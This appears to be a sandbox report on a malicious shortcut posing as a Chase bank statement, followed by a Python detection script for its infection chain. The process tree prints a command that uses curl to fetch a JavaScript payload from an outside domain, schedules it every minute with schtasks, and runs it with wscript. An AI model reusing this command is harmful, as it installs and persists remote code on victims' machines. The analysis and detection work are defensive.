Analysis

Max time kernel: 143s
Max time network: 120s
Platform: windows7_x64
Resource: win7-20240221-en
Resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
Submitted: 28-05-2024 01:36

Static task: static1
Behavioral task: behavioral1
Sample: Chasebank_Statement_May.lnk
Resource: win7-20240221-en (windows7-x64)
5 signatures, 150 seconds
General

Target: Chasebank_Statement_May.lnk
Size: 2KB
MD5: 6bf403f2f1c9d8382fff6ed5a3041899
SHA1: 922df103fec71861594dc918678ad6af27b14851
SHA256: 7c8568685a386cfba733f330d0607fc54246801a6ccfc8b67c61acd11a0f695e
SHA512: d235396894b5c82b1a5d282959f65a00bc2dc021fbabf71746994239b14559db09c4ad3be80a9c70829df0bf197407e64a44b88989fd2d420cb98d03119463e8
Score: 3/10
Malware Config

Signatures

Command and Scripting Interpreter: JavaScript (1 TTP)

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTP, 1 IoC)
  schtasks is often used by malware for persistence or to perform post-infection execution.

Suspicious use of WriteProcessMemory (15 IoCs)
  Processes (each source/target pair was observed three times):
  source PID  source process  target PID  target process  events
  2932        cmd.exe         2600        cmd.exe         3
  2600        cmd.exe         2868        schtasks.exe    3
  2620        taskeng.exe     2456        wscript.EXE     3
  2620        taskeng.exe     1536        wscript.EXE     3
  2620        taskeng.exe     2332        wscript.EXE     3

Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\Chasebank_Statement_May.lnk
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c curl -s -v -o j9KJ7gY13QnF.js "https://livingthemiraculouslife.com/assets/js/rosellateknP.php" & schtasks /create /f /sc minute /mo 1 /tr "wscript 'C:\Users\Admin\AppData\Local\Temp\j9KJ7gY13QnF.js' EhWX76T0MYGVrOQ" /tn EhWX76T0MYGVrOQ
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc minute /mo 1 /tr "wscript 'C:\Users\Admin\AppData\Local\Temp\j9KJ7gY13QnF.js' EhWX76T0MYGVrOQ" /tn EhWX76T0MYGVrOQ
      - Creates scheduled task(s)

C:\Windows\system32\taskeng.exe
  taskeng.exe {515068FE-396F-447A-A6AD-2B973298463D} S-1-5-21-2297530677-1229052932-2803917579-1000:HKULBIBU\Admin:Interactive:[1]
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\wscript.EXE (launched three times with this command line)
    C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\j9KJ7gY13QnF.js" EhWX76T0MYGVrOQ
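The process tree above is a compact living-off-the-land chain: cmd.exe uses curl to drop a .js into the user's Temp directory, registers a schtasks job that fires every minute, and Task Scheduler (taskeng.exe) then launches wscript.EXE against that file. The following detection logic is an added example written for this page, not code from the sandbox or its vendor. It runs three per-process rules over constructed process-creation records built from the command lines in the report (PIDs from the WriteProcessMemory table; the parent PIDs 1000 for the first cmd.exe and 0 for taskeng.exe, the record fields, and the rule names are this example's own assumptions) and then correlates the hits by the script file they share, so that download, persistence and execution are reported as one staged chain rather than three unrelated alerts.

```python
"""Flag the cmd -> curl -> schtasks -> wscript chain in process-creation telemetry.

Added example written for this page; not code from the sandbox or its vendor.
The event records below are constructed from the command lines in the report's
process tree, with PIDs taken from its WriteProcessMemory table. The parent PIDs
1000 (first cmd.exe) and 0 (taskeng.exe), the record fields and the rule names
are this example's own assumptions.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full image path as logged
    cmdline: str   # raw command line as logged


# Constructed sample telemetry (see module docstring for provenance).
EVENTS = [
    ProcEvent(2932, 1000, r"C:\Windows\system32\cmd.exe",
              r"cmd /c C:\Users\Admin\AppData\Local\Temp\Chasebank_Statement_May.lnk"),
    ProcEvent(2600, 2932, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c curl -s -v -o j9KJ7gY13QnF.js '
              r'"https://livingthemiraculouslife.com/assets/js/rosellateknP.php" & '
              r"""schtasks /create /f /sc minute /mo 1 /tr "wscript 'C:\Users\Admin\AppData\Local\Temp\j9KJ7gY13QnF.js' EhWX76T0MYGVrOQ" /tn EhWX76T0MYGVrOQ"""),
    ProcEvent(2868, 2600, r"C:\Windows\system32\schtasks.exe",
              r"""schtasks /create /f /sc minute /mo 1 /tr "wscript 'C:\Users\Admin\AppData\Local\Temp\j9KJ7gY13QnF.js' EhWX76T0MYGVrOQ" /tn EhWX76T0MYGVrOQ"""),
    ProcEvent(2620, 0, r"C:\Windows\system32\taskeng.exe",
              r"taskeng.exe {515068FE-396F-447A-A6AD-2B973298463D} "
              r"S-1-5-21-2297530677-1229052932-2803917579-1000:HKULBIBU\Admin:Interactive:[1]"),
] + [
    ProcEvent(pid, 2620, r"C:\Windows\system32\wscript.EXE",
              r'C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\j9KJ7gY13QnF.js" EhWX76T0MYGVrOQ')
    for pid in (2456, 1536, 2332)
]

SCRIPT_EXT = r"(?:js|jse|vbs|vbe|wsf|hta)"
# curl writing a script-type file via -o; [^&|] keeps the match inside one command of a chained line
CURL_SCRIPT_DL = re.compile(r"\bcurl(?:\.exe)?\b[^&|]*?\s-o\s+\"?(?P<out>[^\s\"]+\." + SCRIPT_EXT + r")\b", re.I)
SCHTASKS_CREATE = re.compile(r"\bschtasks(?:\.exe)?\b[^&|]*?/create\b", re.I)
TR_ARG = re.compile(r"/tr\s+\"(?P<tr>[^\"]*)\"", re.I)
TN_ARG = re.compile(r"/tn\s+\"?(?P<tn>[^\s\"]+)", re.I)
SC_ARG = re.compile(r"/sc\s+(?P<sc>\w+)(?:\s+/mo\s+(?P<mo>\d+))?", re.I)
SCRIPT_PATH = re.compile(r"[A-Za-z]:\\[^\"'\s]+\." + SCRIPT_EXT + r"\b", re.I)
USER_WRITABLE = re.compile(r"\\(?:AppData\\Local\\Temp|Users\\Public|ProgramData)\\", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
CHAIN_RULES = {"curl_script_download", "schtasks_script_host_persistence",
               "script_host_from_user_writable_dir"}


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def check_event(ev: ProcEvent) -> list[dict]:
    """Per-process rules; each finding carries the file artifact it keyed on."""
    out = []
    m = CURL_SCRIPT_DL.search(ev.cmdline)
    if m:
        out.append({"pid": ev.pid, "rule": "curl_script_download", "artifact": m["out"]})
    if SCHTASKS_CREATE.search(ev.cmdline):
        tr, tn, sc = (rx.search(ev.cmdline) for rx in (TR_ARG, TN_ARG, SC_ARG))
        action = tr["tr"] if tr else ""
        host = _basename(action.split()[0]) if action else ""
        host = host if host.endswith(".exe") else host + ".exe"
        script = SCRIPT_PATH.search(action)
        # A task whose action is a script host, or whose target sits in a user-writable
        # directory, is the persistence pattern in the report's process tree.
        if host in SCRIPT_HOSTS or (script and USER_WRITABLE.search(script[0])):
            out.append({"pid": ev.pid, "rule": "schtasks_script_host_persistence",
                        "task": tn["tn"] if tn else None,
                        "schedule": (sc["sc"].lower(), int(sc["mo"] or 1)) if sc else None,
                        "artifact": script[0] if script else None})
    if _basename(ev.image) in SCRIPT_HOSTS:
        script = SCRIPT_PATH.search(ev.cmdline)
        if script and USER_WRITABLE.search(script[0]):
            out.append({"pid": ev.pid, "rule": "script_host_from_user_writable_dir",
                        "parent": ev.ppid, "artifact": script[0]})
    return out


def detect(events: list[ProcEvent]) -> list[dict]:
    """Run per-process rules, then tie them together by the script file they share."""
    findings = [f for ev in events for f in check_event(ev)]
    seen = defaultdict(lambda: defaultdict(set))   # basename -> rule -> pids
    for f in findings:
        if f.get("artifact"):
            seen[_basename(f["artifact"])][f["rule"]].add(f["pid"])
    for name, rules in seen.items():
        if CHAIN_RULES <= set(rules):
            findings.append({"pid": sorted(set().union(*rules.values())),
                             "rule": "staged_persistence_chain", "artifact": name,
                             "runs": len(rules["script_host_from_user_writable_dir"])})
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

Run it to see one curl download hit, two schtasks hits (the cmd.exe line that chains the command and the schtasks.exe child that executes it), three wscript.EXE executions from the user's Temp directory, and a single staged_persistence_chain finding that names task EhWX76T0MYGVrOQ's payload and counts the three runs. Keying on command lines rather than on the dropped file matters here: curl.exe is not part of a stock Windows 7 installation (it shipped with Windows 10 version 1803 onward), and the report does not show whether j9KJ7gY13QnF.js was actually written, yet the process-creation events still carry the full chain.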